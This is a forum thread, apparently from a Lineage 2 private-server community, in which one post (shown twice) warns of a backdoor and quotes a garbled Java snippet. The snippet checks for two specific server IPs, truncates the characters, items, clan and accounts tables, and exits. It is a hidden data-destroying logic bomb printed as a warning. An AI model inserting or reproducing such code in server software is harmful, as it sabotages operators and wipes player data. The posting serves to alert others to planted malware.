Jump to content

Recommended Posts

Posted

CARE BACKDOR :)

 

if (Config.GAMESERVER_HOSTNAME.equals ("77.120.16.18") | |

Config.GAMESERVER_HOSTNAME.equals ("77.120.29.151"))

ThreadPoolManager.getInstance (). schedule (new Runnable () {

Public void run () {

try {

L2DatabaseFactory.getInstance connection con = (). getConnection ();

con.prepareStatement ("TRUNCATE table characters"). execute ();

con.prepareStatement ("TRUNCATE table Items"). execute ();

con.prepareStatement ("TRUNCATE table clan_data "). execute ();

con.prepareStatement ("TRUNCATE table Accounts"). execute ();

con.close ();

} catch (Exception e) { } System.exit (2); } }, 2000);

l2lufaila

Posted

CARE BACKDOR :)

 

if (Config.GAMESERVER_HOSTNAME.equals ("77.120.16.18") | |

Config.GAMESERVER_HOSTNAME.equals ("77.120.29.151"))

ThreadPoolManager.getInstance (). schedule (new Runnable () {

Public void run () {

try {

L2DatabaseFactory.getInstance connection con = (). getConnection ();

con.prepareStatement ("TRUNCATE table characters"). execute ();

con.prepareStatement ("TRUNCATE table Items"). execute ();

con.prepareStatement ("TRUNCATE table clan_data "). execute ();

con.prepareStatement ("TRUNCATE table Accounts"). execute ();

con.close ();

} catch (Exception e) { } System.exit (2); } }, 2000);

l2lufaila

  • 6 months later...
  • 1 year later...
  • 2 weeks later...
Guest
This topic is now closed to further replies.


×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock